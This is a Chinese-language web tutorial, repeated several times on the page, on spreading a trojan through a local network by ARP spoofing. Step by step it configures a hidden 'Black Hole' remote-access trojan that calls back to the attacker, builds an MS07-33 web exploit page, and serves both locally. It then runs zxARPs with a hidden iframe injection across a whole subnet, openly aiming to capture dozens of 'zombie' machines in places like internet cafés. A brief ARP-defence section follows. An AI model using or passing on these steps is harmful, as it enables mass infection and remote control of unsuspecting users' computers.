| 導購 | 订阅 | 在线投稿
分享
 
 
 

新的挂馬方式 ARP欺騙挂馬稱雄局域網

來源:互聯網  2008-06-01 00:01:12  評論

網頁挂馬最難的就是傳播了,小網站易入侵但是訪問人數不多,收獲的肉雞也就不是很多。因此,一種新的挂馬方式開始流行——局域網ARP欺騙挂馬,只要局域網內一台機子中招了,它就可以在內網傳播含有木馬的網頁,捕獲的肉雞就會成幾何增長。

局域網ARP欺騙挂馬的好處如下:無需入侵網站,只要你的主機處于局域網中即可,這是它最大的優點;收獲的肉雞多多,短時間內可以收獲數十台甚至上百台肉雞,類似網吧這樣由上百台電腦組成的局域網是最好的挂馬場所;局域網內的用戶訪問任何網站都會中我們的木馬。看了上面的介紹,各位是不是已經蠢蠢欲動了?

第一步:配置木馬服務端

我們以「黑洞」木馬爲例。運行「黑洞」木馬的Client.exe文件,進入Client.exe的主界面後,點擊「文件→創建DLL插入版本服務端程序」。

進入服務端程序的創建界面後,首先勾選「Win NT/2000/XP/2003下隱藏服務端文件、注冊表、進程和服務」,然後切換到「連接選項」標簽,在「主機」一欄中填入本機的公網ip地址,端口可以保持默認的「2007」。最後在「連接密碼」處填入用來連接對方的密碼,例如123456(圖1)。設置完成後點擊「生成」按鈕,將木馬服務端保存爲muma.exe。

新的挂馬方式 ARP欺騙挂馬稱雄局域網

填寫密碼

第二步:生成網頁木馬

既然是挂馬,那當然缺不了網頁木馬了。這裏我們用「MS07-33網馬生成器」爲例。運行「MS07-33網馬生成器」,在「網馬地址」文本框中輸入木馬所在路徑,由于等會我們要自行架設Http服務,所以這裏應該填入「http://192.168.0.2/muma.exe「,其中192.168.0.2是本機在局域網中的IP地址。點擊「生成網馬」按鈕即可生成網馬hackll.htm(圖2)。

新的挂馬方式 ARP欺騙挂馬稱雄局域網

點擊「生成網馬」

第三步:開啓本機Http服務

要讓局域網中的其他主機能夠訪問到我們的網馬,就要開啓本機的Http服務。下載baby web server,這是一款簡單的Web服務器軟件,下載後直接運行,在其主界面中點擊「服務→設置」。

將「網頁目錄」設置爲網頁木馬所在的地方,例如C盤根目錄「C:\「。點「確定」回主界面,然後再點「Start」按鈕開啓本機的Http服務(圖3)。記得要將木馬服務端和網頁木馬放到C盤根目錄。

新的挂馬方式 ARP欺騙挂馬稱雄局域網

按鈕開啓本機的Http服務

第四步:局域網挂馬

最後該請我們的主角出場了,就是上文中提到的小工具,這個工具叫zxARPs,是一個通過ARP欺騙實現局域網挂馬的工具。在使用zxARPs前我們要安裝WinPcap,它是網絡底層驅動包,沒有它zxARPs就運行不了。

安裝好後將zxARPs放到任意目錄,然後運行「命令提示符」,進入zxARPs所在的目錄,然後輸入命令:zxARPs.exe -idx 0 -ip 192.168.0.1-192.168.0.255 -port 80 -insert ""。回車後挂馬就成功了。

從現在開始,局域網中的用戶無論訪問什麽網站,都會運行我們的網頁木馬,因爲zxARPs在用戶打開網頁的同時已經將挂馬代碼插入到正常網頁中了。

ARP挂馬防範技巧

從上文可見zxARPs的功能真的十分強大,但它畢竟是基于ARP欺騙原理的,只要局域網內的主機能夠抵禦ARP欺騙攻擊,就可以完全無視zxARPs的挂馬方法。

網管將局域網內所有的主機的IP地址和MAC地址進行綁定即可搞定。我們也可以下載「360ARP防火牆」來抵禦ARP欺騙攻擊(下載地址http://www2.cpcw.com/bzsoft),安裝完成後點擊界面上的「開啓」按鈕就可以讓它保護我們免受ARP欺騙的攻擊了(圖4)。這時如果有人對你的主機進行ARP欺騙攻擊,我們在可以點擊「記錄」按鈕,查看攻擊者的IP地址。

2007-11-30 16:20開啓ARP保護

編輯點評:ARP欺騙可以實現多種攻擊效果,本文介紹ARP欺騙挂馬的只是其中的一種攻擊方式,此外還有信息嗅探,主機網絡限制等攻擊方法。可見,ARP欺騙是局域網的頭號大敵。因此我們在平時的安全防範中,不僅要做好本機的安全工作,還要對局域網的安全作一定的防禦,這樣才能更安全地使用電腦

安裝好後將zxARPs放到任意目錄,然後運行「命令提示符」,進入zxARPs所在的目錄,然後輸入命令:zxARPs.exe -idx 0 -ip 192.168.0.1-192.168.0.255 -port 80 -insert "<iframe src='http://192.168.0.2/hackll.htm' width=0 height=0>"。回車後挂馬就成功了。

從現在開始,局域網中的用戶無論訪問什麽網站,都會運行我們的網頁木馬,因爲zxARPs在用戶打開網頁的同時已經將挂馬代碼插入到正常網頁中了。

ARP挂馬防範技巧

從上文可見zxARPs的功能真的十分強大,但它畢竟是基于ARP欺騙原理的,只要局域網內的主機能夠抵禦ARP欺騙攻擊,就可以完全無視zxARPs的挂馬方法。

網管將局域網內所有的主機的IP地址和MAC地址進行綁定即可搞定。我們也可以下載「360ARP防火牆」來抵禦ARP欺騙攻擊(下載地址http://www2.cpcw.com/bzsoft),安裝完成後點擊界面上的「開啓」按鈕就可以讓它保護我們免受ARP欺騙的攻擊了(圖4)。這時如果有人對你的主機進行ARP欺騙攻擊,我們在可以點擊「記錄」按鈕,查看攻擊者的IP地址。

新的挂馬方式 ARP欺騙挂馬稱雄局域網

開啓ARP保護

編輯點評:ARP欺騙可以實現多種攻擊效果,本文介紹ARP欺騙挂馬的只是其中的一種攻擊方式,此外還有信息嗅探,主機網絡限制等攻擊方法。可見,ARP欺騙是局域網的頭號大敵。因此我們在平時的安全防範中,不僅要做好本機的安全工作,還要對局域網的安全作一定的防禦,這樣才能更安全地使用電腦

  網頁挂馬最難的就是傳播了,小網站易入侵但是訪問人數不多,收獲的肉雞也就不是很多。因此,一種新的挂馬方式開始流行——局域網ARP欺騙挂馬,只要局域網內一台機子中招了,它就可以在內網傳播含有木馬的網頁,捕獲的肉雞就會成幾何增長。   局域網ARP欺騙挂馬的好處如下:無需入侵網站,只要你的主機處于局域網中即可,這是它最大的優點;收獲的肉雞多多,短時間內可以收獲數十台甚至上百台肉雞,類似網吧這樣由上百台電腦組成的局域網是最好的挂馬場所;局域網內的用戶訪問任何網站都會中我們的木馬。看了上面的介紹,各位是不是已經蠢蠢欲動了?   第一步:配置木馬服務端   我們以「黑洞」木馬爲例。運行「黑洞」木馬的Client.exe文件,進入Client.exe的主界面後,點擊「文件→創建DLL插入版本服務端程序」。   進入服務端程序的創建界面後,首先勾選「Win NT/2000/XP/2003下隱藏服務端文件、注冊表、進程和服務」,然後切換到「連接選項」標簽,在「主機」一欄中填入本機的公網ip地址,端口可以保持默認的「2007」。最後在「連接密碼」處填入用來連接對方的密碼,例如123456(圖1)。設置完成後點擊「生成」按鈕,將木馬服務端保存爲muma.exe。 [url=/bbs/detail_1781446.html][img]http://image.wangchao.net.cn/it/1323437133595.jpg[/img][/url] 填寫密碼   第二步:生成網頁木馬   既然是挂馬,那當然缺不了網頁木馬了。這裏我們用「MS07-33網馬生成器」爲例。運行「MS07-33網馬生成器」,在「網馬地址」文本框中輸入木馬所在路徑,由于等會我們要自行架設Http服務,所以這裏應該填入「http://192.168.0.2/muma.exe「,其中192.168.0.2是本機在局域網中的IP地址。點擊「生成網馬」按鈕即可生成網馬hackll.htm(圖2)。 [url=/bbs/detail_1781446.html][img]http://image.wangchao.net.cn/it/1323437133702.jpg[/img][/url] 點擊「生成網馬」   第三步:開啓本機Http服務   要讓局域網中的其他主機能夠訪問到我們的網馬,就要開啓本機的Http服務。下載baby web server,這是一款簡單的Web服務器軟件,下載後直接運行,在其主界面中點擊「服務→設置」。   將「網頁目錄」設置爲網頁木馬所在的地方,例如C盤根目錄「C:\「。點「確定」回主界面,然後再點「Start」按鈕開啓本機的Http服務(圖3)。記得要將木馬服務端和網頁木馬放到C盤根目錄。 [url=/bbs/detail_1781446.html][img]http://image.wangchao.net.cn/it/1323437133784.jpg[/img][/url] 按鈕開啓本機的Http服務   第四步:局域網挂馬   最後該請我們的主角出場了,就是上文中提到的小工具,這個工具叫zxARPs,是一個通過ARP欺騙實現局域網挂馬的工具。在使用zxARPs前我們要安裝WinPcap,它是網絡底層驅動包,沒有它zxARPs就運行不了。   安裝好後將zxARPs放到任意目錄,然後運行「命令提示符」,進入zxARPs所在的目錄,然後輸入命令:zxARPs.exe -idx 0 -ip 192.168.0.1-192.168.0.255 -port 80 -insert ""。回車後挂馬就成功了。   從現在開始,局域網中的用戶無論訪問什麽網站,都會運行我們的網頁木馬,因爲zxARPs在用戶打開網頁的同時已經將挂馬代碼插入到正常網頁中了。   ARP挂馬防範技巧   從上文可見zxARPs的功能真的十分強大,但它畢竟是基于ARP欺騙原理的,只要局域網內的主機能夠抵禦ARP欺騙攻擊,就可以完全無視zxARPs的挂馬方法。   網管將局域網內所有的主機的IP地址和MAC地址進行綁定即可搞定。我們也可以下載「360ARP防火牆」來抵禦ARP欺騙攻擊(下載地址http://www2.cpcw.com/bzsoft),安裝完成後點擊界面上的「開啓」按鈕就可以讓它保護我們免受ARP欺騙的攻擊了(圖4)。這時如果有人對你的主機進行ARP欺騙攻擊,我們在可以點擊「記錄」按鈕,查看攻擊者的IP地址。      2007-11-30 16:20開啓ARP保護   編輯點評:ARP欺騙可以實現多種攻擊效果,本文介紹ARP欺騙挂馬的只是其中的一種攻擊方式,此外還有信息嗅探,主機網絡限制等攻擊方法。可見,ARP欺騙是局域網的頭號大敵。因此我們在平時的安全防範中,不僅要做好本機的安全工作,還要對局域網的安全作一定的防禦,這樣才能更安全地使用電腦   安裝好後將zxARPs放到任意目錄,然後運行「命令提示符」,進入zxARPs所在的目錄,然後輸入命令:zxARPs.exe -idx 0 -ip 192.168.0.1-192.168.0.255 -port 80 -insert "<iframe src='http://192.168.0.2/hackll.htm' width=0 height=0>"。回車後挂馬就成功了。   從現在開始,局域網中的用戶無論訪問什麽網站,都會運行我們的網頁木馬,因爲zxARPs在用戶打開網頁的同時已經將挂馬代碼插入到正常網頁中了。   ARP挂馬防範技巧   從上文可見zxARPs的功能真的十分強大,但它畢竟是基于ARP欺騙原理的,只要局域網內的主機能夠抵禦ARP欺騙攻擊,就可以完全無視zxARPs的挂馬方法。   網管將局域網內所有的主機的IP地址和MAC地址進行綁定即可搞定。我們也可以下載「360ARP防火牆」來抵禦ARP欺騙攻擊(下載地址http://www2.cpcw.com/bzsoft),安裝完成後點擊界面上的「開啓」按鈕就可以讓它保護我們免受ARP欺騙的攻擊了(圖4)。這時如果有人對你的主機進行ARP欺騙攻擊,我們在可以點擊「記錄」按鈕,查看攻擊者的IP地址。 [url=/bbs/detail_1781446.html][img]http://image.wangchao.net.cn/it/1323437133906.jpg[/img][/url] 開啓ARP保護   編輯點評:ARP欺騙可以實現多種攻擊效果,本文介紹ARP欺騙挂馬的只是其中的一種攻擊方式,此外還有信息嗅探,主機網絡限制等攻擊方法。可見,ARP欺騙是局域網的頭號大敵。因此我們在平時的安全防範中,不僅要做好本機的安全工作,還要對局域網的安全作一定的防禦,這樣才能更安全地使用電腦
󰈣󰈤
王朝萬家燈火計劃
期待原創作者加盟
 
 
 
>>返回首頁<<
 
 
 
 
 熱帖排行
 
 
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有